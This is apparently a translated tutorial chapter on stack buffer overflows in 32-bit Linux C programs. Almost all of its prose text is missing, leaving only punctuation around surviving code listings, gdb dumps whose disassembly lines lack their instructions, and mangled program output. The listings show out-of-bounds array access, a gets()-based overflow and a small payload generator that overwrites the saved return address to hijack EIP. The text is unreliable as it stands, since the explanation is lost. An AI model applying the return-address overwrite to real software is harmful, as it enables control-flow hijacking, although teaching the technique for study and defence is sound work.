. 2006.
(Linux x32)
; . , . (), , .
. , , . . , , . . .
. :,text,,bss .data. .text , .data ,bss . bss .data . .data , .bss . ,.text, .
ee (stack) (heap). , LIFO (Last In, First Out - , ); , , LIFO , , , .
, ; .
, , . FIFO (First In, First Out , ). , , , , . 1.
. 1.
. , . , , , Smashing the Stack for Fun and Profit ( ) (Aleph One1). , 1996 ., , , .
|
|
; , , Smashing the Stack. , 25 . , - .
. . .
, ++ - . , , , , , .
, , , . , . , .
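/* First listing: reading one element past the end of a five-element array.
 * Transcription errors fixed ("2. 3." -> "2, 3,", "prinrf" -> "printf");
 * the out-of-bounds read is left in, since it is the point of the listing. */
int main(void) {
    /* Five elements: the valid indices are array[0] through array[4]. */
    int array[5] = {1, 2, 3, 4, 5};
    /* array[5] is one past the end. The read is undefined behaviour in C;
     * what gets printed is whatever happens to follow the array on the
     * stack (the run below shows -1073743044), not a value to rely on. */
    printf("%d\n", array[5]);
    return 0;
}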
-. array, . , : (array[0]) 4 (array[4]). , , . , .
[root@localhost /]# gcc buffer
[root@localhost /]# ./a.out
-1073743044
[root@localhost /]#
, ; . ? , . , .
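/* Second listing: writing far past the end of a five-element array.
 * Transcription errors fixed (the array declaration lost its name, and
 * "255." -> "255;"); the overflow itself is the point of the listing. */
int main(void) {
    int array[5];
    int i;
    /* The loop stores into array[0] .. array[255], 251 elements beyond the
     * five that exist, clobbering whatever lies after the array on the
     * stack. That is what produces the "Segmentation fault" in the run
     * below. A correct loop would stop at i < 5
     * (i.e. sizeof array / sizeof array[0]). */
    for (i = 0; i <= 255; ++i) {
        array[i] = 10;
    }
    return 0;
}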
, , . .
[root@localhost /]# gcc buffer2.c
[root@localhost /]# ./a.out
Segmentation fault (core dumped)
[root@localhost /]#
, , , . , .
|
|
, ? , (, TCP/IP)?
, , . , , . , , , , .
, . , .
, , , stdout:
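/* Reads one line from stdin into a 30-byte stack buffer and echoes it.
 * gets() takes no length, so any line of 30 or more characters runs past
 * `array` and over the saved registers and return address above it — the
 * overflow this chapter demonstrates (and why the crash dump shows
 * eip = 0x41414141). gets() was removed from the language in C11; real
 * code must use a bounded read such as fgets(array, sizeof array, stdin).
 * Transcription error fixed: "pnntf" -> "printf". */
void return_input(void) {
    char array[30];
    gets(array);
    printf("%s\n", array);
}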
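/* Entry point of the "overflow" program: a single call to return_input.
 * Transcription error fixed ("mainO {" -> "int main(void) {"). */
int main(void) {
    return_input();
    return 0;
}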
array , . ( , ). , . :
[root@localhost /]# ./overflow
; , . 40 . .
[root@localhost /]# ./overflow
Segmentation fault (core dumped)
[root@localhost /]#
, , ? ? 2. , array.
. 2.
32- . EP . (RET) . ( 0x41414141, ) . , , . ; :
[root@localhost /]# gdb overflow core
(gdb) info registers
eax 0x29
ecx 0x1000
edx 0x0
ebx 0x401509e4
esp 0xbffffab8
ebp 0x41414141
esi 0x40016b64
edi 0xbffffb2c
eip 0x41414141
, . EIP 0x41414141! , , .
EIP
, , , EIP . , DOS-, , - . . , , EIP.
, , , . EIP , . .
|
|
. return_input , main. , gdb , return_input:
[root@localhost /]# gdb overflow
(gdb) disas main
Dump of assembler code for function main:
0x80484b8 <main>
0x80484b9 <main+1>
0x80484bb <main+3>-
0x80484c0 <main+8>-
0x80484c5 <main+13>
0x80484c6 <main+22>
End of assembler dump.
, 0x80484bb. 0x80484bb ASCII-, . overflow. , 8 ( 8 ). return_input gdb; , array. :
0x8048493 <return_input+3> sub $0x20,%esp
0x20 32, 8 40. :
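/* address_to_char: emits the 44-byte line that the "overflow" program
 * above reads with gets(). It is the address 0x80484bb — an address inside
 * main (main+3 in the disassembly above) — repeated eleven times, so the
 * last copy lands on the saved return address and return_input returns
 * into main instead of where it was called from. Transcription errors
 * fixed ("." -> ";", "^(lonq *)" -> "*(long *)", "," -> ";" in the loop).
 * Written for the 32-bit Linux target the chapter assumes, where long is
 * four bytes; on a 64-bit build the eight-byte store at i == 40 itself
 * runs past stuffing[]. Note also that no byte of the pattern is zero, so
 * puts() has no terminator inside stuffing[] and reads past its end. */
int main(void) {
    int i = 0;
    char stuffing[44];
    for (i = 0; i <= 40; i += 4) {
        *(long *) &stuffing[i] = 0x80484bb;
    }
    puts(stuffing);
    return 0;
}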
, address_to_char overflow. , , . 0x80484bb, EIP. :
[root@localhost /]# (./address_to_char; cat) | ./overflow
input
""""""""""""""<u__.input
input
input
.